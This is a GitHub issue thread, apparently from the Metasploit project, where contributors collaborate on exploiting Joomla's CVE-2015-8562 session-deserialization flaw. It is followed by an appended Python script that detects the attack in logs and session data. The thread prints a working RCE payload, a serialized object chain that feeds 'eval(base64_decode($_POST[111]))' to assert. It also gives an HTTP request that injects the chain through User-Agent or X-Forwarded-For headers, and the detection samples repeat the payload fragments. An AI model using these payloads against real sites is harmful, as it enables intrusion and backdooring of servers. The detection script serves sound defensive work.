
[Request] Critical 0day RCE in Joomla (CVE-2015-8562) #6347

Closed
madmike33 opened this issue Dec 14, 2015 · 104 comments

Comments

@madmike33 commented Dec 14, 2015

@jvoisin Are you interested, mate?

This is a serious vulnerability that can be easily exploited and is already in the wild. http://hubs.ly/H01B2K20

@wvu-r7 (Member) commented Dec 14, 2015

Thank you, @madmike33. Looks much better, lol.

@madmike33 (Author) commented Dec 14, 2015

Agree 😁

@madmike33 madmike33 closed this Dec 14, 2015
@madmike33 madmike33 reopened this Dec 14, 2015
@madmike33 (Author) commented Dec 14, 2015

@wvu-r7 How about some labels?

@FireFart (Contributor) commented Dec 14, 2015

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

@FireFart (Contributor) commented Dec 14, 2015

@wvu-r7 (Member) commented Dec 14, 2015

@madmike33 (Author) commented Dec 14, 2015

@FireFart Thank you, interesting. It's all about uploading the payload in the tokens, if I am not wrong.

@FireFart (Contributor) commented Dec 14, 2015

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

@brandonprry (Contributor) commented Dec 14, 2015

I am very close, give me an hour or so.

@madmike33 (Author) commented Dec 14, 2015

@brandonprry Waiting to be the first one to test it :)

@FireFart (Contributor) commented Dec 14, 2015

@brandonprry Great! I need to get some sleep; will check it tomorrow morning in about 6 hours.

@brandonprry (Contributor) commented Dec 15, 2015

It takes two requests:

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. The intent is obvious, but something seems to be missing...

@brandonprry (Contributor) commented Dec 15, 2015

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

@kendyhikaru commented Dec 15, 2015

@brandonprry Waiting for your info.

@brandonprry (Contributor) commented Dec 15, 2015

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

@brandonprry (Contributor) commented Dec 15, 2015

They are not related.

EDIT: I might have spoken too soon.

@FireFart (Contributor) commented Dec 15, 2015

@brandonprry So that's exactly how far I got :(

@wvu-r7 (Member) commented Dec 15, 2015

I poked at this on my own... and got equally as far, lol.

@wvu-r7 (Member) commented Dec 15, 2015

Think I got it.

@FireFart (Contributor) commented Dec 15, 2015

So it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479

@wvu-r7 (Member) commented Dec 15, 2015

Gonna put together a PoC... hope it's not a fluke!

@FireFart (Contributor) commented Dec 15, 2015

@wvu-r7 👯 so send it over for testing :D

@wvu-r7 (Member) commented Dec 15, 2015

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

@madmike33 (Author) commented Dec 15, 2015

So, anything new so far, guys? The thing is in the payload; according to Sucuri, they modified the payload. @wchen-r7, any idea from your side too?

@wvu-r7 (Member) commented Dec 15, 2015

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

@icehteam commented Dec 15, 2015

Anybody with good knowledge of OOP can execute this; I'm still trying... Anyone using Skype?
Add me: base64_decode('bXIuY2h1cmNobDMzdA=='); lol

@madmike33 (Author) commented Dec 15, 2015

Yes, it's a good idea; we can make a group and everyone can give his idea on Skype, @icehteam.

@cyadron commented Dec 15, 2015

@shargon Do you mean that the next time you reload that page, session info is read from the database and deserialized and the object is executed?

@shargon commented Dec 15, 2015

@cyadron Yes, I thought it is like this: to run the exploit, it's necessary to make 2 calls, one for poisoning, two for execution.

The execution part is simple: Joomla deserializes the session and runs the poison...

The hard work is making the correct payload to exploit it.

@madmike33 (Author) commented Dec 15, 2015

Yes, what @cyadron said is true; we need two calls, as @brandonprry stated earlier.

@FireFart (Contributor) commented Dec 15, 2015

Guys, please use IRC or Skype for discussing this exploit; this issue is getting too big and too off-topic.

@icehteam commented Dec 15, 2015

My Skype is base64_decode('bXIuY2h1cmNobDMzdA=='); let me know yours, folks.

@shargon commented Dec 15, 2015

@madmike33
Copy link
Author

@madmike33 madmike33 commented Dec 15, 2015

👍 @shargon

@cyadron commented Dec 15, 2015

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

@borismattijssen commented Dec 15, 2015

Edit: decided to remove the screenshot, as I just posted it out of excitement, not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

@jstnkndy (Contributor) commented Dec 15, 2015

@borismattijssen What's the purpose of posting a screenshot but no technical details?

@borismattijssen commented Dec 15, 2015

@jstnkndy I feel like the vulnerability is too young to share the technical details on the Internet...

@FireFart (Contributor) commented Dec 15, 2015

lol

@jstnkndy (Contributor) commented Dec 15, 2015

So the screenshot is just... bragging?

@borismattijssen commented Dec 15, 2015

Just showing it isn't that hard...

@falconz commented Dec 15, 2015

@borismattijssen I see the vulnerability is in User-Agent or X-Forwarded-For; why did you hide the URI?

@HackerOnTwoWheels commented Dec 15, 2015

@falconz My guess: it is not a private address, lol.

@FireFart (Contributor) commented Dec 15, 2015

Closing this because the details are publicly available and a module is also ready.

@FireFart FireFart closed this Dec 15, 2015
@wchen-r7 (Contributor) commented Dec 15, 2015

@FireFart In your commit, I recommend just doing Resolve #6347. That way, when your PR lands, this issue automatically gets tagged and closed. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

@wvu-r7 (Member) commented Dec 17, 2015

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

@wchen-r7 wchen-r7 changed the title [Request] Critical 0day RCE in joomla [Request] Critical 0day RCE in Joomla (CVE-2015-8562) Dec 17, 2015
@s1m096 commented Dec 18, 2015

Does not work with me...

@ggg4566 commented Dec 19, 2015

Does not work on versions below 3.x; need to find another trick.

@bgeesaman commented Dec 20, 2015

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

@JohnMartinelli commented Dec 20, 2015

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY FOR CODING THE FIXES, as I have never contributed to an open source project (big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.


@icehteam commented Dec 20, 2015

@ggg4566 X-Forwarded-For is working in 3.x; you need to use User-Agent for some versions. @JohnMartinelli you're late to the party fff...

@am06 commented Dec 21, 2015

I've read that a session_decode() bug is needed for this to work...? Can anyone please tell me what that bug is about?

@VivekShingala commented Oct 6, 2017

Is this error harmful for other frameworks like CodeIgniter or core PHP websites? I have found these logs in such frameworks. I do not use Joomla for most of the sites; however, I still find these logs.

If yes, what steps should be taken to prevent it?
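The thread above shows what these requests look like from the server's side: a PHP-serialized object (`O:21:"JDatabaseDriverMysqli":3:{...`) carried in the User-Agent or X-Forwarded-For header, which Joomla writes into the `data` column of its *_session table and deserializes on a later request. The following is an added detection example for defenders, not code from this thread, from Metasploit or from Joomla. It scans Apache combined-format access log lines for headers carrying serialized-object markers, and applies a heuristic to session-table rows, assuming (as the thread states for 3.4.5) that a healthy row holds only the `__default` namespace. The sample log lines and session rows are constructed, modelled on the request and error output quoted earlier in the thread. Whether a particular framework is actually exploitable by such a request is a separate question this example does not answer; it only flags that the pattern arrived.

```python
"""Detection helpers for the serialized-PHP-object requests discussed in the thread.

Added example; not the thread's, Metasploit's or Joomla's own code.
"""
import re
from typing import Dict, List, Optional

# A PHP serialized object looks like O:<len>:"<Class>":<count>:{ ... }.
# Apache writes a double quote inside a logged header as \", so the quote
# is matched with an optional preceding backslash.
SERIALIZED_OBJECT = re.compile(r'O:\d+:\\?"([A-Za-z_][A-Za-z0-9_]*)\\?":\d+:\{')

# Session-namespace injection as seen in the thread: a closing brace followed
# by a fresh "<name>|" namespace (the quoted payload used __test; Joomla's
# normal namespace is __default).
NAMESPACE_INJECTION = re.compile(r'\}__[A-Za-z0-9_]+\|')

# Classes that appear in the payload quoted in this thread. None of them has a
# legitimate reason to be serialized into a visitor's session or an HTTP header.
WATCHLIST_CLASSES = {"JDatabaseDriverMysqli", "JDatabaseDriverMysql",
                     "JSimplepieFactory", "SimplePie"}

# Apache "combined" log format; referer and user-agent fields may contain \".
COMBINED_LOG = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Constructed sample log lines (not taken from the page). The first carries a
# serialized object in its User-Agent, modelled on the request quoted in the
# thread; the second is an ordinary browser request.
SAMPLE_LOG_LINES = [
    '192.168.0.10 - - [14/Dec/2015:18:06:35 +0000] "GET / HTTP/1.1" 500 1234 "-" '
    '"}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";'
    'O:17:\\"JSimplepieFactory\\":0:{}}"',
    '192.168.0.11 - - [14/Dec/2015:18:07:01 +0000] "GET /index.php HTTP/1.1" 200 5678 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0"',
]

# Constructed session-table rows (the `data` column of *_session).
BENIGN_SESSION_ROW = '__default|a:1:{s:7:"counter";i:1;}'
SUSPICIOUS_SESSION_ROW = ('__default|a:1:{s:7:"counter";i:1;}'
                          '__test|O:21:"JDatabaseDriverMysqli":3:{}')


def find_markers(value: str) -> List[str]:
    """Return the markers found in one header value (empty list if clean).

    Apply this to User-Agent, X-Forwarded-For or any other header the
    application persists; the thread names the first two.
    """
    markers: List[str] = []
    if NAMESPACE_INJECTION.search(value):
        markers.append("namespace_injection")
    classes = set(SERIALIZED_OBJECT.findall(value))
    if classes:
        markers.append("serialized_object")
    if classes & WATCHLIST_CLASSES:
        markers.append("watchlist_class")
    return markers


def scan_log_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one combined-format line; report it if its User-Agent is suspicious."""
    m = COMBINED_LOG.match(line)
    if not m:
        return None  # not a combined-format line; nothing to judge
    markers = find_markers(m.group("agent"))
    if not markers:
        return None
    return {"client": m.group("client"), "time": m.group("time"),
            "request": m.group("request"), "status": m.group("status"),
            "markers": markers}


def scan_log_lines(lines) -> List[Dict[str, object]]:
    """Findings for every suspicious line in an iterable of log lines."""
    return [f for f in (scan_log_line(line) for line in lines) if f]


def is_suspicious_session_data(data: str) -> bool:
    """Heuristic for a *_session `data` row.

    Assumption: a healthy Joomla 3.4 row contains only the __default
    namespace. Any extra namespace, or any watchlist class serialized into
    the row, is flagged.
    """
    namespaces = re.findall(r'(?:^|(?<=[;}]))([A-Za-z_][A-Za-z0-9_]*)\|', data)
    if any(ns != "__default" for ns in namespaces):
        return True
    return bool(set(SERIALIZED_OBJECT.findall(data)) & WATCHLIST_CLASSES)


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(finding)
    print("benign row suspicious:", is_suspicious_session_data(BENIGN_SESSION_ROW))
    print("injected row suspicious:", is_suspicious_session_data(SUSPICIOUS_SESSION_ROW))
```

Because the default combined format does not log X-Forwarded-For, run `find_markers` over that header too if your log format captures it (or at the reverse proxy). A hit on `serialized_object` alone is worth a look; `watchlist_class` or `namespace_injection` on a site that stores headers into its session is the case to escalate, and the session-row check lets you confirm after the fact whether anything actually landed in the table.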
